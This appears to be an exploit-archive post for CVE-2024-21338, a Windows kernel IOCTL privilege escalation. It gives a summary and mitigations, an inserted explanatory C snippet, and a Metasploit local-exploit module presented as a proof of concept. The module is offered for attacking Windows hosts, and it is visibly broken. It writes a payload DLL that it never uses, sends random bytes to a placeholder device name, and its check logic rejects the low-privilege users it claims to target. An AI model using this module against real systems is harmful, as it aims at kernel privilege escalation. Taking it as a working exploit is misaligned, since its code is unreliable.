Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control

=============================================================================================================================================
| # Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control |
=============================================================================================================================================
| # Title : Windows 11 Pro 23H2 Kernel IOCTL Access Control Vulnerability Exploit |
| # Author : indoushka |
| # Tested on : Windows 11 Fr(Pro) / browser : Mozilla Firefox 145.0.1 (64 bits) |
| # Vendor : System built-in component. No standalone download available. |
=============================================================================================================================================

POC :

[+] References : https://packetstorm.news/files/id/177869/ & CVE-2024-21338


[+] Summary :

CVE-2024-21338 is a security vulnerability in the Microsoft Windows Kernel involving insufficient access control for IOCTL (Input/Output Control) handlers.
This vulnerability allows non-privileged users to access kernel-level functionality that should be restricted, potentially leading to privilege escalation.

Technical Details:

  Vulnerability Type  : Insufficient Access Control
  Attack Vector       : Local
  Privileges Required : Low
  Impact              : Privilege Escalation

Affected Systems:

  Windows 10 (various versions)
  Windows 11 (various versions)
  Windows Server 2019/2022

Key Components:

  Vulnerable Component : Windows Kernel IOCTL handlers
  Attack Mechanism     : Direct kernel object manipulation
  Exploitation         : Through device driver interface

Exploitation Flow:

  1. Identify vulnerable IOCTL handlers
  2. Open handle to vulnerable device driver
  3. Craft malicious IOCTL requests
  4. Bypass access control checks
  5. Execute arbitrary code in kernel context

Mitigation Strategies:

  Apply Security Updates : Install Microsoft January 2024 security patches
  Driver Whitelisting    : Implement driver signature enforcement
  Access Control         : Restrict access to device interfaces
  Monitoring             : Monitor for suspicious driver activity
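
One way to see the access-control point concretely, as an added example that is not part of the original advisory or its module: decode the IOCTL code quoted in the module options (0x222003) against the CTL_CODE layout from the WDK and compare it with a hardened redefinition of the same function number. The hardened code and the user-mode access-check model are assumptions made here for illustration, not Microsoft's fix for CVE-2024-21338.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Constants mirror the WDK definitions (devioctl.h). */
#define METHOD_BUFFERED     0
#define METHOD_NEITHER      3
#define FILE_ANY_ACCESS     0
#define FILE_READ_ACCESS    1
#define FILE_WRITE_ACCESS   2
#define FILE_DEVICE_UNKNOWN 0x22

/* CTL_CODE layout: DeviceType[31:16] | RequiredAccess[15:14] | Function[13:2] | Method[1:0] */
#define CTL_CODE(dev, func, method, access) \
    (((uint32_t)(dev) << 16) | ((uint32_t)(access) << 14) | ((uint32_t)(func) << 2) | (uint32_t)(method))
#define IOCTL_DEVICE(code)   (((code) >> 16) & 0xFFFF)
#define IOCTL_ACCESS(code)   (((code) >> 14) & 0x3)
#define IOCTL_FUNCTION(code) (((code) >> 2) & 0xFFF)
#define IOCTL_METHOD(code)   ((code) & 0x3)

/* The control code quoted in the advisory's module options. */
#define ADVISORY_IOCTL 0x222003u

/* Assumed hardened redefinition of the same function number: the handle must have
 * been opened for read and write, and METHOD_BUFFERED makes the I/O manager copy and
 * size-check the buffers instead of handing the driver raw user-mode pointers. */
#define HARDENED_IOCTL \
    CTL_CODE(FILE_DEVICE_UNKNOWN, IOCTL_FUNCTION(ADVISORY_IOCTL), METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS)

/* User-mode model of the check the I/O manager applies before a request reaches the driver
 * (and that IoValidateDeviceIoControlAccess lets the driver re-apply): the caller's handle must
 * hold every access bit the code demands. A FILE_ANY_ACCESS code demands nothing, so a handle
 * opened with no rights at all gets through. */
bool ioctl_access_permitted(uint32_t code, uint32_t granted_access)
{
    uint32_t required = IOCTL_ACCESS(code);
    return (granted_access & required) == required;
}

static void describe(const char *label, uint32_t code)
{
    printf("%s 0x%06X: device=0x%02X function=0x%03X method=%u access=%u, no-rights handle -> %s\n",
           label, (unsigned)code, (unsigned)IOCTL_DEVICE(code), (unsigned)IOCTL_FUNCTION(code),
           (unsigned)IOCTL_METHOD(code), (unsigned)IOCTL_ACCESS(code),
           ioctl_access_permitted(code, 0) ? "ALLOWED" : "denied");
}

int main(void)
{
    describe("advisory", ADVISORY_IOCTL); /* method=3 (METHOD_NEITHER), access=0 (FILE_ANY_ACCESS): ALLOWED */
    describe("hardened", HARDENED_IOCTL); /* access=3: denied until the handle holds read+write */
    return 0;
}
```

The advisory's code decodes to FILE_ANY_ACCESS with METHOD_NEITHER, the combination that puts the whole burden of access control and pointer validation on the driver's own dispatch routine.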

Detection Indicators:

  Unusual IOCTL requests to kernel drivers
  Attempts to access privileged device interfaces
  Unexpected driver loading patterns

[+] POC :

#############################################
# Exploit Title: Windows 10.0.17763.5458 Kernel IOCTL Access Control Vulnerability Exploit CVE-2024-21338
# Author: indoushka
#############################################

require 'msf/core'

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::File # provides write_file, used in exploit
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Kernel IOCTL Insufficient Access Control Vulnerability CVE-2024-21338',
        'Description' => %q{
          This module exploits an insufficient access control vulnerability in the Windows Kernel
          through exposed IOCTL handlers. The vulnerability allows non-privileged users to access
          kernel-level functionality leading to privilege escalation.
        },
        'Author' => ['indoushka'],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-21338'],
          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21338'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-21338']
        ],
        'Platform' => 'win',
        'Arch' => [ARCH_X64],
        'SessionTypes' => ['meterpreter'],
        'Payload' => {
          'Space' => 4096,
          'DisableNops' => true
        },
        'Targets' => [
          [
            'Windows 10/11 x64',
            {
              'Arch' => ARCH_X64,
              'Platform' => 'win'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'DisclosureDate' => '2024-01-09',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('DEVICE_NAME', [true, 'Vulnerable device name', '\\\\.\\VulnerableDriver']),
      OptInt.new('IOCTL_CODE', [true, 'Vulnerable IOCTL code', 0x222003])
    ])
  end

  def check
    if sysinfo['OS'] !~ /windows/i
      return CheckCode::Safe('Target is not a Windows system')
    end

    if sysinfo['Architecture'] !~ /x64/
      return CheckCode::Safe('Target architecture is not supported')
    end

    unless is_system?
      return CheckCode::Detected('User does not have SYSTEM privileges')
    end

    device_path = datastore['DEVICE_NAME']
    if device_exists?(device_path)
      CheckCode::Appears('Vulnerable device driver detected')
    else
      CheckCode::Safe('Vulnerable device driver not found')
    end
  end

  def exploit
    print_status('Starting exploitation for CVE-2024-21338')

    unless check == CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
    end

    print_status('Generating payload...')
    payload_data = generate_payload_dll

    temp_path = "#{get_env('TEMP')}\\#{Rex::Text.rand_text_alpha(8)}.dll"
    print_status("Writing payload to #{temp_path}")
    write_file(temp_path, payload_data)
    register_file_for_cleanup(temp_path)

    print_status('Triggering vulnerability via IOCTL...')
    if trigger_exploit(temp_path)
      print_good('Exploitation successful!')
    else
      fail_with(Failure::Unknown, 'Exploitation failed')
    end
  end

  private

  # Opens the configured device path read-only to test whether the driver is present.
  def device_exists?(device_path)
    begin
      file = client.railgun.kernel32.CreateFileA(
        device_path,
        'GENERIC_READ',
        'FILE_SHARE_READ|FILE_SHARE_WRITE',
        nil,
        'OPEN_EXISTING',
        'FILE_ATTRIBUTE_NORMAL',
        0
      )

      if file['return'] != client.railgun.const('INVALID_HANDLE_VALUE')
        client.railgun.kernel32.CloseHandle(file['return'])
        return true
      end
    rescue
      return false
    end

    false
  end

  def trigger_exploit(payload_path)
    begin
      device_handle = client.railgun.kernel32.CreateFileA(
        datastore['DEVICE_NAME'],
        'GENERIC_READ|GENERIC_WRITE',
        0,
        nil,
        'OPEN_EXISTING',
        0,
        0
      )

      if device_handle['return'] == client.railgun.const('INVALID_HANDLE_VALUE')
        print_error('Failed to open device handle')
        return false
      end

      buffer_size = 1024
      input_buffer = Rex::Text.rand_text_alpha(buffer_size)
      ioctl_result = client.railgun.kernel32.DeviceIoControl(
        device_handle['return'],
        datastore['IOCTL_CODE'],
        input_buffer,
        input_buffer.length,
        nil,
        0,
        4, # lpBytesReturned: railgun allocates a 4-byte out buffer
        nil
      )

      client.railgun.kernel32.CloseHandle(device_handle['return'])

      if ioctl_result['return']
        print_good('IOCTL sent successfully')
        return true
      else
        print_error('IOCTL failed')
        return false
      end
    rescue => e
      print_error("Exploitation error: #{e.message}")
      return false
    end
  end
end

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
